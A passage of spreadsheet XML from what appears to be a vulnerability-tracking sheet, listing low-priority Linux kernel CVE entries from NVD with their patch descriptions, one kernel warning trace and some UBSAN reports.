Fix it by setting 'ftrace_managed = true' in register_fentry_multi().</t>
        </is>
      </c>
      <c r="T927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93111</t>
        </is>
      </c>
    </row>
    <row r="928">
      <c r="A928" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B928" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93112</t>
        </is>
      </c>
      <c r="D928" s="5" t="inlineStr"/>
      <c r="E928" s="5" t="inlineStr"/>
      <c r="F928" s="5" t="inlineStr"/>
      <c r="G928" s="5" t="inlineStr"/>
      <c r="H928" s="5" t="inlineStr"/>
      <c r="I928" s="5" t="inlineStr"/>
      <c r="J928" s="5" t="inlineStr"/>
      <c r="K928" s="5" t="inlineStr"/>
      <c r="L928" s="5" t="inlineStr"/>
      <c r="M928" s="5" t="inlineStr"/>
      <c r="N928" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O928" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P928" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q928" s="5" t="inlineStr"/>
      <c r="R928" s="5" t="inlineStr"/>
      <c r="S928" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Require a BPF cpumask for bpf_cpumask_populate()
bpf_cpumask_populate() writes to its destination with bitmap_copy(), but
the destination is typed as struct cpumask *. That allows the verifier to
accept borrowed cpumask pointers returned by read-only kfuncs, such as
scx_bpf_get_online_cpumask(), as a writable destination.
Make the destination a struct bpf_cpumask * so populate follows the same
ownership rule as the other mutating cpumask kfuncs. Query kfuncs continue
to accept const struct cpumask * inputs.</t>
        </is>
      </c>
      <c r="T928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93112</t>
        </is>
      </c>
    </row>
    <row r="929">
      <c r="A929" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B929" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93113</t>
        </is>
      </c>
      <c r="D929" s="5" t="inlineStr"/>
      <c r="E929" s="5" t="inlineStr"/>
      <c r="F929" s="5" t="inlineStr"/>
      <c r="G929" s="5" t="inlineStr"/>
      <c r="H929" s="5" t="inlineStr"/>
      <c r="I929" s="5" t="inlineStr"/>
      <c r="J929" s="5" t="inlineStr"/>
      <c r="K929" s="5" t="inlineStr"/>
      <c r="L929" s="5" t="inlineStr"/>
      <c r="M929" s="5" t="inlineStr"/>
      <c r="N929" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O929" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P929" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q929" s="5" t="inlineStr"/>
      <c r="R929" s="5" t="inlineStr"/>
      <c r="S929" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clk: qcom: camcc-sc8280xp: unregister CAMCC_GDSC_CLK
With the introduction of sync_state support in the clk and pmdomain
subsystems, the following warning happens when the unused clocks are
shutdown in camcc-sc8280xp:
    [   15.408367] titan_top_gdsc status stuck at 'on'
    [   15.408429] WARNING: drivers/clk/qcom/gdsc.c:178 at gdsc_toggle_logic+0x14c/0x160, CPU#2: kworker/u32:1/14
    [   15.408462] Modules linked in: bnep vfat fat ath11k_pci(+) ath11k mac80211 cfg80211 mhi libarc4 snd_soc_wcd938x snd_soc_wcd938x_sdw snd_soc_wcd_classh hci_uart snd_soc_wcd_common
    snd_soc_sc8280xp soundwire_qcom snd_soc_wcd_mbhc snd_soc_qcom_sdw slimbus snd_soc_qcom_common regmap_sdw btqca btrtl qcom_camss soundwire_bus btbcm btintel snd_soc_sdca snd_soc_lpass_wsa_macro
    bluetooth snd_soc_lpass_tx_macro snd_soc_lpass_va_macro snd_soc_lpass_rx_macro snd_soc_hdmi_codec snd_soc_lpass_macro_common videobuf2_dma_sg ov5675 v4l2_fwnode videobuf2_memops
    qcom_spmi_adc5 snd_soc_core qcom_spmi_adc_tm5 videobuf2_v4l2 snd_seq snd_seq_device videobuf2_common v4l2_async qcom_vadc_common qcom_spmi_temp_alarm pm8941_pwrkey industrialio videodev
    snd_compress rfkill ac97_bus snd_pcm_dmaengine qcom_tsens mc qcom_edac snd_pcm pci_pwrctrl_pwrseq qcom_cpufreq_hw snd_timer snd qcomtee soundcore tee leds_gpio joydev binfmt_misc zram
    lz4hc_compress governor_simpleondemand panel_edp msm xhci_plat_hcd nvme nvme_core dwc3 qcom_pm8008_regulator
    [   15.408688]  ucsi_glink nvme_keyring nvme_auth pmic_glink_altmode udc_core typec_ucsi aux_hpd_bridge qcom_battmgr ulpi ubwc_config socinfo ocmem drm_gpuvm qcom_q6v5_pas drm_exec
    qcom_pil_info leds_qcom_lpg gpu_sched led_class_multicolor rtc_pm8xxx qcom_pbs qcom_common drm_display_helper qcom_pon qcom_glink_smem qcom_glink ghash_ce pwrseq_qcom_wcn gpio_sbu_mux
    qcom_stats phy_qcom_qmp_combo qcom_q6v5 gf128mul cec dispcc_sc8280xp phy_qcom_edp camcc_sc8280xp i2c_qcom_cci qcom_sysmon drm_dp_aux_bus mdt_loader aux_bridge qcom_pm8008 i2c_hid_of_elan
    dwc3_qcom_legacy llcc_qcom icc_bwmon gpi typec qcom_refgen_regulator phy_qcom_qmp_usb nvmem_qfprom qcom_ipcc phy_qcom_snps_femto_v2 gpucc_sc8280xp pinctrl_sc8280xp_lpass_lpi qcom_hwspinlock
    pinctrl_lpass_lpi lpasscc_sc8280xp qrtr qcom_aoss pmic_glink pdr_interface phy_qcom_qmp_pcie qcom_smd qcom_pdr_msg icc_osm_l3 qcom_wdt qmi_helpers qcom_rng smp2p rpmsg_core gpio_keys pwm_bl
    smem hid_multitouch fuse i2c_dev
    [   15.408928] CPU: 2 UID: 0 PID: 14 Comm: kworker/u32:1 Not tainted 7.1.0+ #2 PREEMPT(lazy)
    [   15.408937] Hardware name: LENOVO 21BX0016US/21BX0016US, BIOS N3HET88W (1.60 ) 03/14/2024
    [   15.408942] Workqueue: pm pm_runtime_work
    [   15.408959] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
    [   15.408967] pc : gdsc_toggle_logic+0x14c/0x160
    [   15.408978] lr : gdsc_toggle_logic+0x14c/0x160
    [   15.408987] sp : ffff8000800f3b40
    [   15.408991] x29: ffff8000800f3b40 x28: 0000000000000000 x27: 0000000000000000
    [   15.409003] x26: 0000000000000000 x25: 0000000000000000 x24: 0000000000000000
    [   15.409014] x23: 0000000000000000 x22: 0000000000000001 x21: ffffa33f298fca88
    [   15.409024] x20: 0000000000000000 x19: ffffa33f298fc5b0 x18: 00cd15db75dacefd
    [   15.409035] x17: 000000040044ffff x16: ffffa33f3b1a3d88 x15: 726f776b80000002
    [   15.409045] x14: ffffffffffffffff x13: 0000000000000028 x12: 0101010101010101
    [   15.409056] x11: 7f7f7f7f7f7f7f7f x10: fefeff3039313274 x9 : ffffa33f3a5edafc
    [   15.409067] x8 : ffff8000800f3780 x7 : 0000000000000001 x6 : 0000000000000001
    [   15.409078] x5 : ffff000bf3ca1288 x4 : 0000000000000000 x3 : ffff5cccb6a3f000
    [   15.409088] x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff000080ae0000
    [   15.409098] Call trace:
    [   15.409103]  gdsc_toggle_logic+0x14c/0x160 (P)
    [   15.409115]  gdsc_disable+0x4c/0x190
    [   15.409126]  _genp
---truncated---</t>
        </is>
      </c>
      <c r="T929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93113</t>
        </is>
      </c>
    </row>
    <row r="930">
      <c r="A930" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B930" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93114</t>
        </is>
      </c>
      <c r="D930" s="5" t="inlineStr"/>
      <c r="E930" s="5" t="inlineStr"/>
      <c r="F930" s="5" t="inlineStr"/>
      <c r="G930" s="5" t="inlineStr"/>
      <c r="H930" s="5" t="inlineStr"/>
      <c r="I930" s="5" t="inlineStr"/>
      <c r="J930" s="5" t="inlineStr"/>
      <c r="K930" s="5" t="inlineStr"/>
      <c r="L930" s="5" t="inlineStr"/>
      <c r="M930" s="5" t="inlineStr"/>
      <c r="N930" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O930" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P930" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q930" s="5" t="inlineStr"/>
      <c r="R930" s="5" t="inlineStr"/>
      <c r="S930" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/surface: acpi-notify: Check ACPI companion before use
Since every platform driver can be forced to match a device that doesn't
match its list of device IDs because of device_match_driver_override(),
platform drivers that rely on the existence of a device's ACPI companion
object should verify its presence.
san_probe() dereferences the result of ACPI_COMPANION() when installing
the GSBUS address space handler, so force-binding the driver to a device
without an ACPI companion leads to a NULL pointer dereference.  The
dereference was introduced when the probe function was switched from
ACPI_HANDLE() to ACPI_COMPANION().
Check the ACPI companion against NULL and return -ENODEV when it is
missing, like commit e4865a56d013 ("ACPI: driver: Check ACPI_COMPANION()
against NULL during probe") does for the core ACPI platform drivers.</t>
        </is>
      </c>
      <c r="T930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93114</t>
        </is>
      </c>
    </row>
    <row r="931">
      <c r="A931" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B931" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93115</t>
        </is>
      </c>
      <c r="D931" s="5" t="inlineStr"/>
      <c r="E931" s="5" t="inlineStr"/>
      <c r="F931" s="5" t="inlineStr"/>
      <c r="G931" s="5" t="inlineStr"/>
      <c r="H931" s="5" t="inlineStr"/>
      <c r="I931" s="5" t="inlineStr"/>
      <c r="J931" s="5" t="inlineStr"/>
      <c r="K931" s="5" t="inlineStr"/>
      <c r="L931" s="5" t="inlineStr"/>
      <c r="M931" s="5" t="inlineStr"/>
      <c r="N931" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O931" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P931" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q931" s="5" t="inlineStr"/>
      <c r="R931" s="5" t="inlineStr"/>
      <c r="S931" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/mellanox: mlxbf-pmc: Check ACPI_COMPANION() against NULL
Every platform driver can be forced to match a device that doesn't match
its list of device IDs because of device_match_driver_override(), so
platform drivers that rely on the existence of a device's ACPI companion
object need to verify its presence.
mlxbf_pmc_probe() passes the result of ACPI_COMPANION() to
acpi_device_hid(), which dereferences it, so force-binding the driver to
a device without an ACPI companion leads to a NULL pointer dereference.
Accordingly, add a requisite ACPI_COMPANION() check against NULL to the
mlxbf-pmc driver and return -ENODEV when the companion is missing.</t>
        </is>
      </c>
      <c r="T931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93115</t>
        </is>
      </c>
    </row>
    <row r="932">
      <c r="A932" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B932" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93116</t>
        </is>
      </c>
      <c r="D932" s="5" t="inlineStr"/>
      <c r="E932" s="5" t="inlineStr"/>
      <c r="F932" s="5" t="inlineStr"/>
      <c r="G932" s="5" t="inlineStr"/>
      <c r="H932" s="5" t="inlineStr"/>
      <c r="I932" s="5" t="inlineStr"/>
      <c r="J932" s="5" t="inlineStr"/>
      <c r="K932" s="5" t="inlineStr"/>
      <c r="L932" s="5" t="inlineStr"/>
      <c r="M932" s="5" t="inlineStr"/>
      <c r="N932" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O932" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P932" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q932" s="5" t="inlineStr"/>
      <c r="R932" s="5" t="inlineStr"/>
      <c r="S932" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: asus-wmi: fix resource leaks on probe failure
During driver initialization in asus_wmi_add(), various subsystems are
registered sequentially. However, the error path labels are out of order
relative to the registration sequence.
Specifically:
1. If asus_wmi_custom_fan_curve_init() fails, the driver jumps to
   fail_custom_fan_curve. Because this label is placed below fail_sysfs,
   it bypasses the cleanup calls for the input device and sysfs groups,
   which were successfully registered before, leaking those resources.
2. If asus_screenpad_init() fails, the driver jumps to fail_screenpad.
   Because fail_screenpad is placed below fail_backlight, it bypasses the
   cleanup calls for backlight and rfkill, leaking those resources.
Fix these resource leaks by reordering the error path labels in
asus_wmi_add() to match the exact reverse order of the resource
allocations.</t>
        </is>
      </c>
      <c r="T932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93116</t>
        </is>
      </c>
    </row>
    <row r="933">
      <c r="A933" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B933" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93117</t>
        </is>
      </c>
      <c r="D933" s="5" t="inlineStr"/>
      <c r="E933" s="5" t="inlineStr"/>
      <c r="F933" s="5" t="inlineStr"/>
      <c r="G933" s="5" t="inlineStr"/>
      <c r="H933" s="5" t="inlineStr"/>
      <c r="I933" s="5" t="inlineStr"/>
      <c r="J933" s="5" t="inlineStr"/>
      <c r="K933" s="5" t="inlineStr"/>
      <c r="L933" s="5" t="inlineStr"/>
      <c r="M933" s="5" t="inlineStr"/>
      <c r="N933" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O933" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P933" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q933" s="5" t="inlineStr"/>
      <c r="R933" s="5" t="inlineStr"/>
      <c r="S933" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: fix UAF when probe runs concurrent to dyn ID removal
Dynamic IDs are only guaranteed to be valid when usb_dynids_lock is held,
as remove_id_store can free the node. Thus, make a copy in
usb_probe_interface. Clarify the documentation that the id parameter is
only valid during the probe.
USB serial has the same pattern, but it does not need fixing as the IDs
cannot be removed via sysfs.</t>
        </is>
      </c>
      <c r="T933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93117</t>
        </is>
      </c>
    </row>
    <row r="934">
      <c r="A934" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B934" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93118</t>
        </is>
      </c>
      <c r="D934" s="5" t="inlineStr"/>
      <c r="E934" s="5" t="inlineStr"/>
      <c r="F934" s="5" t="inlineStr"/>
      <c r="G934" s="5" t="inlineStr"/>
      <c r="H934" s="5" t="inlineStr"/>
      <c r="I934" s="5" t="inlineStr"/>
      <c r="J934" s="5" t="inlineStr"/>
      <c r="K934" s="5" t="inlineStr"/>
      <c r="L934" s="5" t="inlineStr"/>
      <c r="M934" s="5" t="inlineStr"/>
      <c r="N934" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O934" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P934" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q934" s="5" t="inlineStr"/>
      <c r="R934" s="5" t="inlineStr"/>
      <c r="S934" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: aspeed_udc: check endpoint DMA allocation
ast_udc_probe() allocates a coherent DMA buffer used as the backing store
for endpoint buffers. ast_udc_init_ep() derives per-endpoint buffer
pointers from udc-&gt;ep0_buf, so a failed allocation is dereferenced during
probe.
Check the allocation before endpoint setup. The existing probe error path
called ast_udc_remove(), which unregisters the gadget unconditionally and
is not safe before usb_add_gadget_udc() succeeds. Add a local cleanup
helper for probe failures so pre-registration failures only unwind the
resources that were actually initialized.
This was found by a local static analysis checker for unchecked allocator
returns while scanning Linux 6.16. The change was checked by applying it
to current mainline and by running checkpatch. I do not have access to
Aspeed UDC hardware, so no runtime testing was performed.</t>
        </is>
      </c>
      <c r="T934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93118</t>
        </is>
      </c>
    </row>
    <row r="935">
      <c r="A935" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B935" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93119</t>
        </is>
      </c>
      <c r="D935" s="5" t="inlineStr"/>
      <c r="E935" s="5" t="inlineStr"/>
      <c r="F935" s="5" t="inlineStr"/>
      <c r="G935" s="5" t="inlineStr"/>
      <c r="H935" s="5" t="inlineStr"/>
      <c r="I935" s="5" t="inlineStr"/>
      <c r="J935" s="5" t="inlineStr"/>
      <c r="K935" s="5" t="inlineStr"/>
      <c r="L935" s="5" t="inlineStr"/>
      <c r="M935" s="5" t="inlineStr"/>
      <c r="N935" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O935" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P935" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q935" s="5" t="inlineStr"/>
      <c r="R935" s="5" t="inlineStr"/>
      <c r="S935" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: ljca: bound bank_num in ljca_enumerate_gpio()
ljca_enumerate_gpio() reads desc-&gt;bank_num from the device and loops
valid_pin[i] = get_unaligned_le32(...) for i &lt; bank_num. valid_pin[]
holds only LJCA_MAX_GPIO_NUM / 32 = 2 entries.
Two checks run before the loop. The reply length must match
struct_size(desc, bank_desc, bank_num). The product
pins_per_bank * bank_num must not exceed LJCA_MAX_GPIO_NUM. Neither one
bounds bank_num against the size of valid_pin[]. The reply is capped at
LJCA_MAX_PAYLOAD_SIZE (60) bytes, so the struct_size check limits
bank_num to 9. A device that reports bank_num 9 with pins_per_bank 7
still passes both checks. gpio_num is 63 and the reply is 56 bytes. The
loop then writes nine u32 into the two entry array and overruns
valid_pin[] on the stack.
A broken or malicious LJCA device can therefore overflow the stack.
Reject a bank_num that does not fit valid_pin[].</t>
        </is>
      </c>
      <c r="T935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93119</t>
        </is>
      </c>
    </row>
    <row r="936">
      <c r="A936" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B936" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93120</t>
        </is>
      </c>
      <c r="D936" s="5" t="inlineStr"/>
      <c r="E936" s="5" t="inlineStr"/>
      <c r="F936" s="5" t="inlineStr"/>
      <c r="G936" s="5" t="inlineStr"/>
      <c r="H936" s="5" t="inlineStr"/>
      <c r="I936" s="5" t="inlineStr"/>
      <c r="J936" s="5" t="inlineStr"/>
      <c r="K936" s="5" t="inlineStr"/>
      <c r="L936" s="5" t="inlineStr"/>
      <c r="M936" s="5" t="inlineStr"/>
      <c r="N936" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O936" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P936" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q936" s="5" t="inlineStr"/>
      <c r="R936" s="5" t="inlineStr"/>
      <c r="S936" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: configfs: fix out-of-bounds read of qw_sign
os_desc_qw_sign_show() passes OS_STRING_QW_SIGN_LEN as the input
length to utf16s_to_utf8s(), but that argument counts UTF-16 code
units while OS_STRING_QW_SIGN_LEN (14) is the byte size of qw_sign[].
The array holds only OS_STRING_QW_SIGN_LEN / 2 (7) code units, so the
conversion reads up to 7 units (14 bytes) past the end of qw_sign[]
into the following members of struct gadget_info when the stored
signature fills the array without a NUL terminator, exposing those
bytes through the configfs attribute.
The store path halves the count for its input bound but passes the
full byte count as the utf8s_to_utf16s() output limit; use the
destination code-unit count in both directions.</t>
        </is>
      </c>
      <c r="T936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93120</t>
        </is>
      </c>
    </row>
    <row r="937">
      <c r="A937" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B937" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93121</t>
        </is>
      </c>
      <c r="D937" s="5" t="inlineStr"/>
      <c r="E937" s="5" t="inlineStr"/>
      <c r="F937" s="5" t="inlineStr"/>
      <c r="G937" s="5" t="inlineStr"/>
      <c r="H937" s="5" t="inlineStr"/>
      <c r="I937" s="5" t="inlineStr"/>
      <c r="J937" s="5" t="inlineStr"/>
      <c r="K937" s="5" t="inlineStr"/>
      <c r="L937" s="5" t="inlineStr"/>
      <c r="M937" s="5" t="inlineStr"/>
      <c r="N937" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O937" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P937" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q937" s="5" t="inlineStr"/>
      <c r="R937" s="5" t="inlineStr"/>
      <c r="S937" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: f_fs: Fix fence cleanup in ffs_dmabuf_transfer() error paths
The error paths for endpoint-disabled (ESHUTDOWN) and request-allocation
failure (ENOMEM) in ffs_dmabuf_transfer() jump to err_fence_put which
calls dma_fence_put() on the fence. However, at that point the fence has
only been kmalloc'd — dma_fence_init() has not been called yet, so the
refcount and the fence ops are uninitialized. Calling dma_fence_put() on
such an object leads to undefined behavior.
Use kfree() instead, since the fence is just a plain allocation at this
stage, and rename the label to err_fence_free to reflect the actual
cleanup action.</t>
        </is>
      </c>
      <c r="T937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93121</t>
        </is>
      </c>
    </row>
    <row r="938">
      <c r="A938" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B938" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93122</t>
        </is>
      </c>
      <c r="D938" s="5" t="inlineStr"/>
      <c r="E938" s="5" t="inlineStr"/>
      <c r="F938" s="5" t="inlineStr"/>
      <c r="G938" s="5" t="inlineStr"/>
      <c r="H938" s="5" t="inlineStr"/>
      <c r="I938" s="5" t="inlineStr"/>
      <c r="J938" s="5" t="inlineStr"/>
      <c r="K938" s="5" t="inlineStr"/>
      <c r="L938" s="5" t="inlineStr"/>
      <c r="M938" s="5" t="inlineStr"/>
      <c r="N938" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O938" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P938" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q938" s="5" t="inlineStr"/>
      <c r="R938" s="5" t="inlineStr"/>
      <c r="S938" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: uac: validate rate list length before storing
UAC1 and UAC2 configfs rate-list attributes parse a comma-separated
list of sampling rates and store each parsed value in fixed-size arrays.
The arrays have UAC_MAX_RATES entries, but the store paths do not check
that the input contains at most that many tokens before writing through
opts-&gt;name##s[i++].
Writing more than ten rates therefore writes past the end of the
p_srates[] or c_srates[] array in struct f_uac1_opts or struct
f_uac2_opts.
With CONFIG_UBSAN_BOUNDS enabled, writing an 11-entry rate list to the
UAC1 p_srate attribute reports:
  UBSAN: array-index-out-of-bounds
  drivers/usb/gadget/function/f_uac1.c:1669:1
  index 10 is out of range for type 'int [10]'
  __ubsan_handle_out_of_bounds.cold
  f_uac1_opts_p_srate_store
  configfs_write_iter
  vfs_write
  ksys_write
  do_syscall_64
The same reproducer against the UAC2 p_srate attribute reports:
  UBSAN: array-index-out-of-bounds
  drivers/usb/gadget/function/f_uac2.c:2087:1
  index 10 is out of range for type 'int [10]'
  __ubsan_handle_out_of_bounds.cold
  f_uac2_opts_p_srate_store
  configfs_write_iter
  vfs_write
  ksys_write
  do_syscall_64
Reject additional tokens once UAC_MAX_RATES entries have been parsed.
Also keep the original kstrdup() pointer for kfree(), because strsep()
advances the parsing cursor. Freeing the advanced cursor leaks the
original buffer on successful parses and can free an interior pointer on
some error paths.</t>
        </is>
      </c>
      <c r="T938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93122</t>
        </is>
      </c>
    </row>
    <row r="939">
      <c r="A939" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B939" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93123</t>
        </is>
      </c>
      <c r="D939" s="5" t="inlineStr"/>
      <c r="E939" s="5" t="inlineStr"/>
      <c r="F939" s="5" t="inlineStr"/>
      <c r="G939" s="5" t="inlineStr"/>
      <c r="H939" s="5" t="inlineStr"/>
      <c r="I939" s="5" t="inlineStr"/>
      <c r="J939" s="5" t="inlineStr"/>
      <c r="K939" s="5" t="inlineStr"/>
      <c r="L939" s="5" t="inlineStr"/>
      <c r="M939" s="5" t="inlineStr"/>
      <c r="N939" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O939" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P939" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q939" s="5" t="inlineStr"/>
      <c r="R939" s="5" t="inlineStr"/>
      <c r="S939" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
serial: qcom-geni: do not advance stale DMA completions
The qcom GENI serial DMA TX completion path advances the transmit fifo by
the number of bytes recorded in port-&gt;tx_remaining.
If uart_flush_buffer() runs after the hardware has completed a DMA
transfer but before the DMA completion interrupt has been handled, the
serial core resets the transmit fifo while port-&gt;tx_remaining still
describes the old DMA transfer.
A previous fix avoided advancing an empty fifo by checking that the fifo
length is at least tx_remaining. That still does not distinguish the old
DMA payload from new bytes written after the flush. If userspace writes
new data before the stale DMA completion interrupt is handled, the fifo
can again contain at least tx_remaining bytes and the stale completion
can advance and discard those new bytes.
Mark an in-flight DMA transfer stale when the transmit fifo is flushed.
The later completion still unprepares the original DMA mapping using the
saved length, but it no longer advances the transmit fifo.</t>
        </is>
      </c>
      <c r="T939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93123</t>
        </is>
      </c>
    </row>
    <row r="940">
      <c r="A940" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B940" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93124</t>
        </is>
      </c>
      <c r="D940" s="5" t="inlineStr"/>
      <c r="E940" s="5" t="inlineStr"/>
      <c r="F940" s="5" t="inlineStr"/>
      <c r="G940" s="5" t="inlineStr"/>
      <c r="H940" s="5" t="inlineStr"/>
